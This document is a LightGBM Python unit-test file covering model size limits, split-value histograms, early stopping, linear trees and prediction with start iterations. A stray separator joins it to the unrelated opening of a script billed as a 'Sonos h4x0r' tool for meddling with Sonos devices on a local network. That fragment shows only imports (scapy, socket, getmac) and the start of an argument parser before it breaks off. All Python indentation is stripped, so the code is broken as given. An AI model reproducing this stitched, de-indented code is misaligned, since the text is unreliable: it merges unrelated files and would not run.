def test_model_size():
X, y = load_boston(return_X_y=True)
data = lgb.Dataset(X, y)
bst = lgb.train({'verbose': -1}, data, num_boost_round=2)
y_pred = bst.predict(X)
model_str = bst.model_to_string()
one_tree = model_str[model_str.find('Tree=1'):model_str.find('end of trees')]
one_tree_size = len(one_tree)
one_tree = one_tree.replace('Tree=1', 'Tree={}')
multiplier = 100
total_trees = multiplier + 2
try:
before_tree_sizes = model_str[:model_str.find('tree_sizes')]
trees = model_str[model_str.find('Tree=0'):model_str.find('end of trees')]
more_trees = (one_tree * multiplier).format(*range(2, total_trees))
after_trees = model_str[model_str.find('end of trees'):]
num_end_spaces = 2**31 - one_tree_size * total_trees
new_model_str = f"{before_tree_sizes}\n\n{trees}{more_trees}{after_trees}{'':{num_end_spaces}}"
assert len(new_model_str) > 2**31
bst.model_from_string(new_model_str, verbose=False)
assert bst.num_trees() == total_trees
y_pred_new = bst.predict(X, num_iteration=2)
np.testing.assert_allclose(y_pred, y_pred_new)
except MemoryError:
pytest.skipTest('not enough RAM')
def test_get_split_value_histogram():
X, y = load_boston(return_X_y=True)
lgb_train = lgb.Dataset(X, y, categorical_feature=[2])
gbm = lgb.train({'verbose': -1}, lgb_train, num_boost_round=20)
# test XGBoost-style return value
params = {'feature': 0, 'xgboost_style': True}
assert gbm.get_split_value_histogram(**params).shape == (9, 2)
assert gbm.get_split_value_histogram(bins=999, **params).shape == (9, 2)
assert gbm.get_split_value_histogram(bins=-1, **params).shape == (1, 2)
assert gbm.get_split_value_histogram(bins=0, **params).shape == (1, 2)
assert gbm.get_split_value_histogram(bins=1, **params).shape == (1, 2)
assert gbm.get_split_value_histogram(bins=2, **params).shape == (2, 2)
assert gbm.get_split_value_histogram(bins=6, **params).shape == (5, 2)
assert gbm.get_split_value_histogram(bins=7, **params).shape == (6, 2)
if lgb.compat.PANDAS_INSTALLED:
np.testing.assert_allclose(
gbm.get_split_value_histogram(0, xgboost_style=True).values,
gbm.get_split_value_histogram(gbm.feature_name()[0], xgboost_style=True).values
)
np.testing.assert_allclose(
gbm.get_split_value_histogram(X.shape[-1] - 1, xgboost_style=True).values,
gbm.get_split_value_histogram(gbm.feature_name()[X.shape[-1] - 1], xgboost_style=True).values
)
else:
np.testing.assert_allclose(
gbm.get_split_value_histogram(0, xgboost_style=True),
gbm.get_split_value_histogram(gbm.feature_name()[0], xgboost_style=True)
)
np.testing.assert_allclose(
gbm.get_split_value_histogram(X.shape[-1] - 1, xgboost_style=True),
gbm.get_split_value_histogram(gbm.feature_name()[X.shape[-1] - 1], xgboost_style=True)
)
# test numpy-style return value
hist, bins = gbm.get_split_value_histogram(0)
assert len(hist) == 23
assert len(bins) == 24
hist, bins = gbm.get_split_value_histogram(0, bins=999)
assert len(hist) == 999
assert len(bins) == 1000
with pytest.raises(ValueError):
gbm.get_split_value_histogram(0, bins=-1)
with pytest.raises(ValueError):
gbm.get_split_value_histogram(0, bins=0)
hist, bins = gbm.get_split_value_histogram(0, bins=1)
assert len(hist) == 1
assert len(bins) == 2
hist, bins = gbm.get_split_value_histogram(0, bins=2)
assert len(hist) == 2
assert len(bins) == 3
hist, bins = gbm.get_split_value_histogram(0, bins=6)
assert len(hist) == 6
assert len(bins) == 7
hist, bins = gbm.get_split_value_histogram(0, bins=7)
assert len(hist) == 7
assert len(bins) == 8
hist_idx, bins_idx = gbm.get_split_value_histogram(0)
hist_name, bins_name = gbm.get_split_value_histogram(gbm.feature_name()[0])
np.testing.assert_array_equal(hist_idx, hist_name)
np.testing.assert_allclose(bins_idx, bins_name)
hist_idx, bins_idx = gbm.get_split_value_histogram(X.shape[-1] - 1)
hist_name, bins_name = gbm.get_split_value_histogram(gbm.feature_name()[X.shape[-1] - 1])
np.testing.assert_array_equal(hist_idx, hist_name)
np.testing.assert_allclose(bins_idx, bins_name)
# test bins string type
if np.__version__ > '1.11.0':
hist_vals, bin_edges = gbm.get_split_value_histogram(0, bins='auto')
hist = gbm.get_split_value_histogram(0, bins='auto', xgboost_style=True)
if lgb.compat.PANDAS_INSTALLED:
mask = hist_vals > 0
np.testing.assert_array_equal(hist_vals[mask], hist['Count'].values)
np.testing.assert_allclose(bin_edges[1:][mask], hist['SplitValue'].values)
else:
mask = hist_vals > 0
np.testing.assert_array_equal(hist_vals[mask], hist[:, 1])
np.testing.assert_allclose(bin_edges[1:][mask], hist[:, 0])
# test histogram is disabled for categorical features
with pytest.raises(lgb.basic.LightGBMError):
gbm.get_split_value_histogram(2)
def test_early_stopping_for_only_first_metric():
def metrics_combination_train_regression(valid_sets, metric_list, assumed_iteration,
first_metric_only, feval=None):
params = {
'objective': 'regression',
'learning_rate': 1.1,
'num_leaves': 10,
'metric': metric_list,
'verbose': -1,
'seed': 123
}
gbm = lgb.train(dict(params, first_metric_only=first_metric_only), lgb_train,
num_boost_round=25, valid_sets=valid_sets, feval=feval,
early_stopping_rounds=5, verbose_eval=False)
assert assumed_iteration == gbm.best_iteration
def metrics_combination_cv_regression(metric_list, assumed_iteration,
first_metric_only, eval_train_metric, feval=None):
params = {
'objective': 'regression',
'learning_rate': 0.9,
'num_leaves': 10,
'metric': metric_list,
'verbose': -1,
'seed': 123,
'gpu_use_dp': True
}
ret = lgb.cv(dict(params, first_metric_only=first_metric_only),
train_set=lgb_train, num_boost_round=25,
stratified=False, feval=feval,
early_stopping_rounds=5, verbose_eval=False,
eval_train_metric=eval_train_metric)
assert assumed_iteration == len(ret[list(ret.keys())[0]])
X, y = load_boston(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)
X_test1, X_test2, y_test1, y_test2 = train_test_split(X_test, y_test, test_size=0.5, random_state=73)
lgb_train = lgb.Dataset(X_train, y_train)
lgb_valid1 = lgb.Dataset(X_test1, y_test1, reference=lgb_train)
lgb_valid2 = lgb.Dataset(X_test2, y_test2, reference=lgb_train)
iter_valid1_l1 = 3
iter_valid1_l2 = 14
iter_valid2_l1 = 2
iter_valid2_l2 = 15
assert len(set([iter_valid1_l1, iter_valid1_l2, iter_valid2_l1, iter_valid2_l2])) == 4
iter_min_l1 = min([iter_valid1_l1, iter_valid2_l1])
iter_min_l2 = min([iter_valid1_l2, iter_valid2_l2])
iter_min_valid1 = min([iter_valid1_l1, iter_valid1_l2])
iter_cv_l1 = 4
iter_cv_l2 = 12
assert len(set([iter_cv_l1, iter_cv_l2])) == 2
iter_cv_min = min([iter_cv_l1, iter_cv_l2])
# test for lgb.train
metrics_combination_train_regression(lgb_valid1, [], iter_valid1_l2, False)
metrics_combination_train_regression(lgb_valid1, [], iter_valid1_l2, True)
metrics_combination_train_regression(lgb_valid1, None, iter_valid1_l2, False)
metrics_combination_train_regression(lgb_valid1, None, iter_valid1_l2, True)
metrics_combination_train_regression(lgb_valid1, 'l2', iter_valid1_l2, True)
metrics_combination_train_regression(lgb_valid1, 'l1', iter_valid1_l1, True)
metrics_combination_train_regression(lgb_valid1, ['l2', 'l1'], iter_valid1_l2, True)
metrics_combination_train_regression(lgb_valid1, ['l1', 'l2'], iter_valid1_l1, True)
metrics_combination_train_regression(lgb_valid1, ['l2', 'l1'], iter_min_valid1, False)
metrics_combination_train_regression(lgb_valid1, ['l1', 'l2'], iter_min_valid1, False)
# test feval for lgb.train
metrics_combination_train_regression(lgb_valid1, 'None', 1, False,
feval=lambda preds, train_data: [decreasing_metric(preds, train_data),
constant_metric(preds, train_data)])
metrics_combination_train_regression(lgb_valid1, 'None', 25, True,
feval=lambda preds, train_data: [decreasing_metric(preds, train_data),
constant_metric(preds, train_data)])
metrics_combination_train_regression(lgb_valid1, 'None', 1, True,
feval=lambda preds, train_data: [constant_metric(preds, train_data),
decreasing_metric(preds, train_data)])
# test with two valid data for lgb.train
metrics_combination_train_regression([lgb_valid1, lgb_valid2], ['l2', 'l1'], iter_min_l2, True)
metrics_combination_train_regression([lgb_valid2, lgb_valid1], ['l2', 'l1'], iter_min_l2, True)
metrics_combination_train_regression([lgb_valid1, lgb_valid2], ['l1', 'l2'], iter_min_l1, True)
metrics_combination_train_regression([lgb_valid2, lgb_valid1], ['l1', 'l2'], iter_min_l1, True)
# test for lgb.cv
metrics_combination_cv_regression(None, iter_cv_l2, True, False)
metrics_combination_cv_regression('l2', iter_cv_l2, True, False)
metrics_combination_cv_regression('l1', iter_cv_l1, True, False)
metrics_combination_cv_regression(['l2', 'l1'], iter_cv_l2, True, False)
metrics_combination_cv_regression(['l1', 'l2'], iter_cv_l1, True, False)
metrics_combination_cv_regression(['l2', 'l1'], iter_cv_min, False, False)
metrics_combination_cv_regression(['l1', 'l2'], iter_cv_min, False, False)
metrics_combination_cv_regression(None, iter_cv_l2, True, True)
metrics_combination_cv_regression('l2', iter_cv_l2, True, True)
metrics_combination_cv_regression('l1', iter_cv_l1, True, True)
metrics_combination_cv_regression(['l2', 'l1'], iter_cv_l2, True, True)
metrics_combination_cv_regression(['l1', 'l2'], iter_cv_l1, True, True)
metrics_combination_cv_regression(['l2', 'l1'], iter_cv_min, False, True)
metrics_combination_cv_regression(['l1', 'l2'], iter_cv_min, False, True)
# test feval for lgb.cv
metrics_combination_cv_regression('None', 1, False, False,
feval=lambda preds, train_data: [decreasing_metric(preds, train_data),
constant_metric(preds, train_data)])
metrics_combination_cv_regression('None', 25, True, False,
feval=lambda preds, train_data: [decreasing_metric(preds, train_data),
constant_metric(preds, train_data)])
metrics_combination_cv_regression('None', 1, True, False,
feval=lambda preds, train_data: [constant_metric(preds, train_data),
decreasing_metric(preds, train_data)])
def test_node_level_subcol():
X, y = load_breast_cancer(return_X_y=True)
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
params = {
'objective': 'binary',
'metric': 'binary_logloss',
'feature_fraction_bynode': 0.8,
'feature_fraction': 1.0,
'verbose': -1
}
lgb_train = lgb.Dataset(X_train, y_train)
lgb_eval = lgb.Dataset(X_test, y_test, reference=lgb_train)
evals_result = {}
gbm = lgb.train(params, lgb_train,
num_boost_round=25,
valid_sets=lgb_eval,
verbose_eval=False,
evals_result=evals_result)
ret = log_loss(y_test, gbm.predict(X_test))
assert ret < 0.14
assert evals_result['valid_0']['binary_logloss'][-1] == pytest.approx(ret)
params['feature_fraction'] = 0.5
gbm2 = lgb.train(params, lgb_train, num_boost_round=25)
ret2 = log_loss(y_test, gbm2.predict(X_test))
assert ret != ret2
def test_forced_bins():
x = np.empty((100, 2))
x[:, 0] = np.arange(0, 1, 0.01)
x[:, 1] = -np.arange(0, 1, 0.01)
y = np.arange(0, 1, 0.01)
forcedbins_filename = (
Path(__file__).absolute().parents[2] / 'examples' / 'regression' / 'forced_bins.json'
)
params = {'objective': 'regression_l1',
'max_bin': 5,
'forcedbins_filename': forcedbins_filename,
'num_leaves': 2,
'min_data_in_leaf': 1,
'verbose': -1}
lgb_x = lgb.Dataset(x, label=y)
est = lgb.train(params, lgb_x, num_boost_round=20)
new_x = np.zeros((3, x.shape[1]))
new_x[:, 0] = [0.31, 0.37, 0.41]
predicted = est.predict(new_x)
assert len(np.unique(predicted)) == 3
new_x[:, 0] = [0, 0, 0]
new_x[:, 1] = [-0.9, -0.6, -0.3]
predicted = est.predict(new_x)
assert len(np.unique(predicted)) == 1
params['forcedbins_filename'] = ''
lgb_x = lgb.Dataset(x, label=y)
est = lgb.train(params, lgb_x, num_boost_round=20)
predicted = est.predict(new_x)
assert len(np.unique(predicted)) == 3
params['forcedbins_filename'] = (
Path(__file__).absolute().parents[2] / 'examples' / 'regression' / 'forced_bins2.json'
)
params['max_bin'] = 11
lgb_x = lgb.Dataset(x[:, :1], label=y)
est = lgb.train(params, lgb_x, num_boost_round=50)
predicted = est.predict(x[1:, :1])
_, counts = np.unique(predicted, return_counts=True)
assert min(counts) >= 9
assert max(counts) <= 11
def test_binning_same_sign():
# test that binning works properly for features with only positive or only negative values
x = np.empty((99, 2))
x[:, 0] = np.arange(0.01, 1, 0.01)
x[:, 1] = -np.arange(0.01, 1, 0.01)
y = np.arange(0.01, 1, 0.01)
params = {'objective': 'regression_l1',
'max_bin': 5,
'num_leaves': 2,
'min_data_in_leaf': 1,
'verbose': -1,
'seed': 0}
lgb_x = lgb.Dataset(x, label=y)
est = lgb.train(params, lgb_x, num_boost_round=20)
new_x = np.zeros((3, 2))
new_x[:, 0] = [-1, 0, 1]
predicted = est.predict(new_x)
assert predicted[0] == pytest.approx(predicted[1])
assert predicted[1] != pytest.approx(predicted[2])
new_x = np.zeros((3, 2))
new_x[:, 1] = [-1, 0, 1]
predicted = est.predict(new_x)
assert predicted[0] != pytest.approx(predicted[1])
assert predicted[1] == pytest.approx(predicted[2])
def test_dataset_update_params():
default_params = {"max_bin": 100,
"max_bin_by_feature": [20, 10],
"bin_construct_sample_cnt": 10000,
"min_data_in_bin": 1,
"use_missing": False,
"zero_as_missing": False,
"categorical_feature": [0],
"feature_pre_filter": True,
"pre_partition": False,
"enable_bundle": True,
"data_random_seed": 0,
"is_enable_sparse": True,
"header": True,
"two_round": True,
"label_column": 0,
"weight_column": 0,
"group_column": 0,
"ignore_column": 0,
"min_data_in_leaf": 10,
"linear_tree": False,
"precise_float_parser": True,
"verbose": -1}
unchangeable_params = {"max_bin": 150,
"max_bin_by_feature": [30, 5],
"bin_construct_sample_cnt": 5000,
"min_data_in_bin": 2,
"use_missing": True,
"zero_as_missing": True,
"categorical_feature": [0, 1],
"feature_pre_filter": False,
"pre_partition": True,
"enable_bundle": False,
"data_random_seed": 1,
"is_enable_sparse": False,
"header": False,
"two_round": False,
"label_column": 1,
"weight_column": 1,
"group_column": 1,
"ignore_column": 1,
"forcedbins_filename": "/some/path/forcedbins.json",
"min_data_in_leaf": 2,
"linear_tree": True,
"precise_float_parser": False}
X = np.random.random((100, 2))
y = np.random.random(100)
# decreasing without freeing raw data is allowed
lgb_data = lgb.Dataset(X, y, params=default_params, free_raw_data=False).construct()
default_params["min_data_in_leaf"] -= 1
lgb.train(default_params, lgb_data, num_boost_round=3)
# decreasing before lazy init is allowed
lgb_data = lgb.Dataset(X, y, params=default_params)
default_params["min_data_in_leaf"] -= 1
lgb.train(default_params, lgb_data, num_boost_round=3)
# increasing is allowed
default_params["min_data_in_leaf"] += 2
lgb.train(default_params, lgb_data, num_boost_round=3)
# decreasing with disabled filter is allowed
default_params["feature_pre_filter"] = False
lgb_data = lgb.Dataset(X, y, params=default_params).construct()
default_params["min_data_in_leaf"] -= 4
lgb.train(default_params, lgb_data, num_boost_round=3)
# decreasing with enabled filter is disallowed;
# also changes of other params are disallowed
default_params["feature_pre_filter"] = True
lgb_data = lgb.Dataset(X, y, params=default_params).construct()
for key, value in unchangeable_params.items():
new_params = default_params.copy()
new_params[key] = value
if key != "forcedbins_filename":
param_name = key
else:
param_name = "forced bins"
err_msg = ("Reducing `min_data_in_leaf` with `feature_pre_filter=true` may cause *"
if key == "min_data_in_leaf"
else f"Cannot change {param_name} *")
with np.testing.assert_raises_regex(lgb.basic.LightGBMError, err_msg):
lgb.train(new_params, lgb_data, num_boost_round=3)
def test_dataset_params_with_reference():
default_params = {"max_bin": 100}
X = np.random.random((100, 2))
y = np.random.random(100)
X_val = np.random.random((100, 2))
y_val = np.random.random(100)
lgb_train = lgb.Dataset(X, y, params=default_params, free_raw_data=False).construct()
lgb_val = lgb.Dataset(X_val, y_val, reference=lgb_train, free_raw_data=False).construct()
assert lgb_train.get_params() == default_params
assert lgb_val.get_params() == default_params
lgb.train(default_params, lgb_train, valid_sets=[lgb_val])
def test_extra_trees():
# check extra trees increases regularization
X, y = load_boston(return_X_y=True)
lgb_x = lgb.Dataset(X, label=y)
params = {'objective': 'regression',
'num_leaves': 32,
'verbose': -1,
'extra_trees': False,
'seed': 0}
est = lgb.train(params, lgb_x, num_boost_round=10)
predicted = est.predict(X)
err = mean_squared_error(y, predicted)
params['extra_trees'] = True
est = lgb.train(params, lgb_x, num_boost_round=10)
predicted_new = est.predict(X)
err_new = mean_squared_error(y, predicted_new)
assert err < err_new
def test_path_smoothing():
# check path smoothing increases regularization
X, y = load_boston(return_X_y=True)
lgb_x = lgb.Dataset(X, label=y)
params = {'objective': 'regression',
'num_leaves': 32,
'verbose': -1,
'seed': 0}
est = lgb.train(params, lgb_x, num_boost_round=10)
predicted = est.predict(X)
err = mean_squared_error(y, predicted)
params['path_smooth'] = 1
est = lgb.train(params, lgb_x, num_boost_round=10)
predicted_new = est.predict(X)
err_new = mean_squared_error(y, predicted_new)
assert err < err_new
def test_trees_to_dataframe():
pytest.importorskip("pandas")
def _imptcs_to_numpy(X, impcts_dict):
cols = [f'Column_{i}' for i in range(X.shape[1])]
return [impcts_dict.get(col, 0.) for col in cols]
X, y = load_breast_cancer(return_X_y=True)
data = lgb.Dataset(X, label=y)
num_trees = 10
bst = lgb.train({"objective": "binary", "verbose": -1}, data, num_trees)
tree_df = bst.trees_to_dataframe()
split_dict = (tree_df[~tree_df['split_gain'].isnull()]
.groupby('split_feature')
.size()
.to_dict())
gains_dict = (tree_df
.groupby('split_feature')['split_gain']
.sum()
.to_dict())
tree_split = _imptcs_to_numpy(X, split_dict)
tree_gains = _imptcs_to_numpy(X, gains_dict)
mod_split = bst.feature_importance('split')
mod_gains = bst.feature_importance('gain')
num_trees_from_df = tree_df['tree_index'].nunique()
obs_counts_from_df = tree_df.loc[tree_df['node_depth'] == 1, 'count'].values
np.testing.assert_equal(tree_split, mod_split)
np.testing.assert_allclose(tree_gains, mod_gains)
assert num_trees_from_df == num_trees
np.testing.assert_equal(obs_counts_from_df, len(y))
# test edge case with one leaf
X = np.ones((10, 2))
y = np.random.rand(10)
data = lgb.Dataset(X, label=y)
bst = lgb.train({"objective": "binary", "verbose": -1}, data, num_trees)
tree_df = bst.trees_to_dataframe()
assert len(tree_df) == 1
assert tree_df.loc[0, 'tree_index'] == 0
assert tree_df.loc[0, 'node_depth'] == 1
assert tree_df.loc[0, 'node_index'] == "0-L0"
assert tree_df.loc[0, 'value'] is not None
for col in ('left_child', 'right_child', 'parent_index', 'split_feature',
'split_gain', 'threshold', 'decision_type', 'missing_direction',
'missing_type', 'weight', 'count'):
assert tree_df.loc[0, col] is None
def test_interaction_constraints():
X, y = load_boston(return_X_y=True)
num_features = X.shape[1]
train_data = lgb.Dataset(X, label=y)
# check that constraint containing all features is equivalent to no constraint
params = {'verbose': -1,
'seed': 0}
est = lgb.train(params, train_data, num_boost_round=10)
pred1 = est.predict(X)
est = lgb.train(dict(params, interaction_constraints=[list(range(num_features))]), train_data,
num_boost_round=10)
pred2 = est.predict(X)
np.testing.assert_allclose(pred1, pred2)
# check that constraint partitioning the features reduces train accuracy
est = lgb.train(dict(params, interaction_constraints=[list(range(num_features // 2)),
list(range(num_features // 2, num_features))]),
train_data, num_boost_round=10)
pred3 = est.predict(X)
assert mean_squared_error(y, pred1) < mean_squared_error(y, pred3)
# check that constraints consisting of single features reduce accuracy further
est = lgb.train(dict(params, interaction_constraints=[[i] for i in range(num_features)]), train_data,
num_boost_round=10)
pred4 = est.predict(X)
assert mean_squared_error(y, pred3) < mean_squared_error(y, pred4)
# test that interaction constraints work when not all features are used
X = np.concatenate([np.zeros((X.shape[0], 1)), X], axis=1)
num_features = X.shape[1]
train_data = lgb.Dataset(X, label=y)
est = lgb.train(dict(params, interaction_constraints=[[0] + list(range(2, num_features)),
[1] + list(range(2, num_features))]),
train_data, num_boost_round=10)
def test_linear_trees(tmp_path):
# check that setting linear_tree=True fits better than ordinary trees when data has linear relationship
np.random.seed(0)
x = np.arange(0, 100, 0.1)
y = 2 * x + np.random.normal(0, 0.1, len(x))
x = x[:, np.newaxis]
lgb_train = lgb.Dataset(x, label=y)
params = {'verbose': -1,
'metric': 'mse',
'seed': 0,
'num_leaves': 2}
est = lgb.train(params, lgb_train, num_boost_round=10)
pred1 = est.predict(x)
lgb_train = lgb.Dataset(x, label=y)
res = {}
est = lgb.train(dict(params, linear_tree=True), lgb_train, num_boost_round=10, evals_result=res,
valid_sets=[lgb_train], valid_names=['train'])
pred2 = est.predict(x)
assert res['train']['l2'][-1] == pytest.approx(mean_squared_error(y, pred2), abs=1e-1)
assert mean_squared_error(y, pred2) < mean_squared_error(y, pred1)
# test again with nans in data
x[:10] = np.nan
lgb_train = lgb.Dataset(x, label=y)
est = lgb.train(params, lgb_train, num_boost_round=10)
pred1 = est.predict(x)
lgb_train = lgb.Dataset(x, label=y)
res = {}
est = lgb.train(dict(params, linear_tree=True), lgb_train, num_boost_round=10, evals_result=res,
valid_sets=[lgb_train], valid_names=['train'])
pred2 = est.predict(x)
assert res['train']['l2'][-1] == pytest.approx(mean_squared_error(y, pred2), abs=1e-1)
assert mean_squared_error(y, pred2) < mean_squared_error(y, pred1)
# test again with bagging
res = {}
est = lgb.train(dict(params, linear_tree=True, subsample=0.8, bagging_freq=1), lgb_train,
num_boost_round=10, evals_result=res, valid_sets=[lgb_train], valid_names=['train'])
pred = est.predict(x)
assert res['train']['l2'][-1] == pytest.approx(mean_squared_error(y, pred), abs=1e-1)
# test with a feature that has only one non-nan value
x = np.concatenate([np.ones([x.shape[0], 1]), x], 1)
x[500:, 1] = np.nan
y[500:] += 10
lgb_train = lgb.Dataset(x, label=y)
res = {}
est = lgb.train(dict(params, linear_tree=True, subsample=0.8, bagging_freq=1), lgb_train,
num_boost_round=10, evals_result=res, valid_sets=[lgb_train], valid_names=['train'])
pred = est.predict(x)
assert res['train']['l2'][-1] == pytest.approx(mean_squared_error(y, pred), abs=1e-1)
# test with a categorical feature
x[:250, 0] = 0
y[:250] += 10
lgb_train = lgb.Dataset(x, label=y)
est = lgb.train(dict(params, linear_tree=True, subsample=0.8, bagging_freq=1), lgb_train,
num_boost_round=10, categorical_feature=[0])
# test refit: same results on same data
est2 = est.refit(x, label=y)
p1 = est.predict(x)
p2 = est2.predict(x)
assert np.mean(np.abs(p1 - p2)) < 2
# test refit with save and load
temp_model = str(tmp_path / "temp_model.txt")
est.save_model(temp_model)
est2 = lgb.Booster(model_file=temp_model)
est2 = est2.refit(x, label=y)
p1 = est.predict(x)
p2 = est2.predict(x)
assert np.mean(np.abs(p1 - p2)) < 2
# test refit: different results training on different data
est3 = est.refit(x[:100, :], label=y[:100])
p3 = est3.predict(x)
assert np.mean(np.abs(p2 - p1)) > np.abs(np.max(p3 - p1))
# test when num_leaves - 1 < num_features and when num_leaves - 1 > num_features
X_train, _, y_train, _ = train_test_split(*load_breast_cancer(return_X_y=True), test_size=0.1, random_state=2)
params = {'linear_tree': True,
'verbose': -1,
'metric': 'mse',
'seed': 0}
train_data = lgb.Dataset(X_train, label=y_train, params=dict(params, num_leaves=2))
est = lgb.train(params, train_data, num_boost_round=10, categorical_feature=[0])
train_data = lgb.Dataset(X_train, label=y_train, params=dict(params, num_leaves=60))
est = lgb.train(params, train_data, num_boost_round=10, categorical_feature=[0])
def test_save_and_load_linear(tmp_path):
X_train, X_test, y_train, y_test = train_test_split(*load_breast_cancer(return_X_y=True), test_size=0.1,
random_state=2)
X_train = np.concatenate([np.ones((X_train.shape[0], 1)), X_train], 1)
X_train[:X_train.shape[0] // 2, 0] = 0
y_train[:X_train.shape[0] // 2] = 1
params = {'linear_tree': True}
train_data_1 = lgb.Dataset(X_train, label=y_train, params=params)
est_1 = lgb.train(params, train_data_1, num_boost_round=10, categorical_feature=[0])
pred_1 = est_1.predict(X_train)
tmp_dataset = str(tmp_path / 'temp_dataset.bin')
train_data_1.save_binary(tmp_dataset)
train_data_2 = lgb.Dataset(tmp_dataset)
est_2 = lgb.train(params, train_data_2, num_boost_round=10)
pred_2 = est_2.predict(X_train)
np.testing.assert_allclose(pred_1, pred_2)
model_file = str(tmp_path / 'model.txt')
est_2.save_model(model_file)
est_3 = lgb.Booster(model_file=model_file)
pred_3 = est_3.predict(X_train)
np.testing.assert_allclose(pred_2, pred_3)
def test_linear_single_leaf():
X_train, y_train = load_breast_cancer(return_X_y=True)
train_data = lgb.Dataset(X_train, label=y_train)
params = {
"objective": "binary",
"linear_tree": True,
"min_sum_hessian": 5000
}
bst = lgb.train(params, train_data, num_boost_round=5)
y_pred = bst.predict(X_train)
assert log_loss(y_train, y_pred) < 0.661
def test_predict_with_start_iteration():
def inner_test(X, y, params, early_stopping_rounds):
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1, random_state=42)
train_data = lgb.Dataset(X_train, label=y_train)
valid_data = lgb.Dataset(X_test, label=y_test)
booster = lgb.train(params, train_data, num_boost_round=50, early_stopping_rounds=early_stopping_rounds,
valid_sets=[valid_data])
# test that the predict once with all iterations equals summed results with start_iteration and num_iteration
all_pred = booster.predict(X, raw_score=True)
all_pred_contrib = booster.predict(X, pred_contrib=True)
steps = [10, 12]
for step in steps:
pred = np.zeros_like(all_pred)
pred_contrib = np.zeros_like(all_pred_contrib)
for start_iter in range(0, 50, step):
pred += booster.predict(X, start_iteration=start_iter, num_iteration=step, raw_score=True)
pred_contrib += booster.predict(X, start_iteration=start_iter, num_iteration=step, pred_contrib=True)
np.testing.assert_allclose(all_pred, pred)
np.testing.assert_allclose(all_pred_contrib, pred_contrib)
# test the case where start_iteration <= 0, and num_iteration is None
pred1 = booster.predict(X, start_iteration=-1)
pred2 = booster.predict(X, num_iteration=booster.best_iteration)
np.testing.assert_allclose(pred1, pred2)
# test the case where start_iteration > 0, and num_iteration <= 0
pred4 = booster.predict(X, start_iteration=10, num_iteration=-1)
pred5 = booster.predict(X, start_iteration=10, num_iteration=90)
pred6 = booster.predict(X, start_iteration=10, num_iteration=0)
np.testing.assert_allclose(pred4, pred5)
np.testing.assert_allclose(pred4, pred6)
# test the case where start_iteration > 0, and num_iteration <= 0, with pred_leaf=True
pred4 = booster.predict(X, start_iteration=10, num_iteration=-1, pred_leaf=True)
pred5 = booster.predict(X, start_iteration=10, num_iteration=40, pred_leaf=True)
pred6 = booster.predict(X, start_iteration=10, num_iteration=0, pred_leaf=True)
np.testing.assert_allclose(pred4, pred5)
np.testing.assert_allclose(pred4, pred6)
# test the case where start_iteration > 0, and num_iteration <= 0, with pred_contrib=True
pred4 = booster.predict(X, start_iteration=10, num_iteration=-1, pred_contrib=True)
pred5 = booster.predict(X, start_iteration=10, num_iteration=40, pred_contrib=True)
pred6 = booster.predict(X, start_iteration=10, num_iteration=0, pred_contrib=True)
np.testing.assert_allclose(pred4, pred5)
np.testing.assert_allclose(pred4, pred6)
# test for regression
X, y = load_boston(return_X_y=True)
params = {
'objective': 'regression',
'verbose': -1,
'metric': 'l2',
'learning_rate': 0.5
}
# test both with and without early stopping
inner_test(X, y, params, early_stopping_rounds=1)
inner_test(X, y, params, early_stopping_rounds=5)
inner_test(X, y, params, early_stopping_rounds=None)
# test for multi-class
X, y = load_iris(return_X_y=True)
params = {
'objective': 'multiclass',
'num_class': 3,
'verbose': -1,
'metric': 'multi_error'
}
# test both with and without early stopping
inner_test(X, y, params, early_stopping_rounds=1)
inner_test(X, y, params, early_stopping_rounds=5)
inner_test(X, y, params, early_stopping_rounds=None)
# test for binary
X, y = load_breast_cancer(return_X_y=True)
params = {
'objective': 'binary',
'verbose': -1,
'metric': 'auc'
}
# test both with and without early stopping
inner_test(X, y, params, early_stopping_rounds=1)
inner_test(X, y, params, early_stopping_rounds=5)
inner_test(X, y, params, early_stopping_rounds=None)
def test_average_precision_metric():
# test against sklearn average precision metric
X, y = load_breast_cancer(return_X_y=True)
params = {
'objective': 'binary',
'metric': 'average_precision',
'verbose': -1
}
res = {}
lgb_X = lgb.Dataset(X, label=y)
est = lgb.train(params, lgb_X, num_boost_round=10, valid_sets=[lgb_X], evals_result=res)
ap = res['training']['average_precision'][-1]
pred = est.predict(X)
sklearn_ap = average_precision_score(y, pred)
assert ap == pytest.approx(sklearn_ap)
# test that average precision is 1 where model predicts perfectly
y = y.copy()
y[:] = 1
lgb_X = lgb.Dataset(X, label=y)
lgb.train(params, lgb_X, num_boost_round=1, valid_sets=[lgb_X], evals_result=res)
assert res['training']['average_precision'][-1] == pytest.approx(1)
def test_reset_params_works_with_metric_num_class_and_boosting():
X, y = load_breast_cancer(return_X_y=True)
dataset_params = {"max_bin": 150}
booster_params = {
'objective': 'multiclass',
'max_depth': 4,
'bagging_fraction': 0.8,
'metric': ['multi_logloss', 'multi_error'],
'boosting': 'gbdt',
'num_class': 5
}
dtrain = lgb.Dataset(X, y, params=dataset_params)
bst = lgb.Booster(
params=booster_params,
train_set=dtrain
)
expected_params = dict(dataset_params, **booster_params)
assert bst.params == expected_params
booster_params['bagging_fraction'] += 0.1
new_bst = bst.reset_parameter(booster_params)
expected_params = dict(dataset_params, **booster_params)
assert bst.params == expected_params
assert new_bst.params == expected_params
def test_dump_model():
X, y = load_breast_cancer(return_X_y=True)
train_data = lgb.Dataset(X, label=y)
params = {
"objective": "binary",
"verbose": -1
}
bst = lgb.train(params, train_data, num_boost_round=5)
dumped_model_str = str(bst.dump_model(5, 0))
assert "leaf_features" not in dumped_model_str
assert "leaf_coeff" not in dumped_model_str
assert "leaf_const" not in dumped_model_str
assert "leaf_value" in dumped_model_str
assert "leaf_count" in dumped_model_str
params['linear_tree'] = True
train_data = lgb.Dataset(X, label=y)
bst = lgb.train(params, train_data, num_boost_round=5)
dumped_model_str = str(bst.dump_model(5, 0))
assert "leaf_features" in dumped_model_str
assert "leaf_coeff" in dumped_model_str
assert "leaf_const" in dumped_model_str
assert "leaf_value" in dumped_model_str
assert "leaf_count" in dumped_model_str
|
import argparse
import logging
import sys
import socket
from typing import ByteString
import select
import time
import re
from urllib import request
import scapy
import getmac
from getmac import get_mac_address
from scapy.all import *
def getArgs():
# Parse command-line arguments
argsParser = argparse.ArgumentParser(
description="Sonos h4x0r.\nEnables you to mess around " +
"with sonos devices on the local network.")
argsParser.add_argument(
"-v",
"--verbose",
required=False,
